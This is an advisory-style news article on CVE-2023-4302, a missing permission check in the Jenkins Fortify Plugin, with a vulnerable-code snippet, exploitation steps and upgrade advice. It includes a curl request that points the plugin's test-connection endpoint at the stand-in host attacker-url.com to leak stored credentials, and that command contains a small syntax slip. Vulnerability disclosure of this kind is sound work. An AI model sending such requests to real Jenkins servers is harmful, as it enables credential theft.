CVE CyberSecurity Database News

CVE-2023-4302 Exploit Analysis: Unauthorized Access to Jenkins Fortify Plugin Credentials

Poster -

The Jenkins Fortify Plugin has been detected with a vulnerability - CVE-2023-4302, which potentially allows attackers with Overall/Read permissions to unauthorizedly access confidential stored credentials. This article aims to provide a comprehensive analysis of the exploit, with code snippets, links to original references, and detailed exploitation information.

Overview of the Vulnerability

A missing permission check in Jenkins CI/CD plugin - Fortify Plugin 22.1.38 and earlier, has been detected with a critical vulnerability that can lead to unauthorized access to sensitive data. Attackers with Overall/Read permissions on Jenkins can potentially exploit this flaw to connect to attacker-specified URLs using captured credentials ID, thereby gaining unauthorized access to the credentials stored in Jenkins.

The following code snippet, extracted from the vulnerable version of the Fortify plugin, exhibits the missing permission check:

public FormValidation doTestConnection(
        @QueryParameter String apiUrl,
        @QueryParameter String credentialsId,
        @QueryParameter String clientId,
        @QueryParameter String clientSecret,
        @QueryParameter String fortifyEnvironment)
        throws IOException, ServletException {
    // Missing permission check here
    // Expected Permission Check: Jenkins.get().checkPermission(Jenkins.ADMINISTER);

    // Rest of the code
}

As we can see from the code snippet, the essential permission check - Jenkins.get().checkPermission(Jenkins.ADMINISTER) - has been omitted, giving attackers an unintended entry point to exploit this vulnerability.

To exploit this vulnerability, an attacker can follow these steps

1. Obtaining credentials ID through another technique, such as social engineering or other vulnerabilities within Jenkins.

2. Using the captured credentials ID, initiate a connection to an attacker-specified URL, exploiting the vulnerability and accessing Jenkins credentials without legitimate rights as shown below:

curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' \
    --data 'apiUrl=https://attacker-url.com&credentialsId=CAPTURED-CREDENTIAL-ID&clientId=&clientSecret'; \
    --cookie 'JSESSIONID=<your-session-id>' \
    'https://jenkins.example.com/descriptorByName/io.jenkins.plugins.fortify.cloud.FortifyConfig$DescriptorImpl/doTestConnection';

3. Upon a successful exploitation, the attacker will gain unauthorized access to confidential data stored in Jenkins, such as API keys, passwords, and usernames.

Mitigation Strategies

The vulnerability has been addressed in Fortify Plugin version 22.1.39. It is strongly recommended to update to the latest version to mitigate this vulnerability. Users can update the plugin by visiting the Jenkins plugin management page and applying the latest update.

Additionally, to prevent other vulnerabilities related to permission settings, organizations should ensure a robust and secure permission model is implemented in Jenkins.

For more details on this vulnerability, consult the following resources

- CVE-2023-4302 Official Entry
- Fortify Plugin Changelog
- Jenkins Security Advisory

In conclusion, the CVE-2023-4302 vulnerability in Jenkins Fortify Plugin gives attackers a viable foothold to access sensitive information. Vigilance and prompt mitigation measures are crucial in preventing attackers from exploiting vulnerabilities like this, and safeguarding the valuable stored data.

Timeline

Published on: 08/21/2023 23:15:00 UTC
Last modified on: 08/24/2023 21:36:00 UTC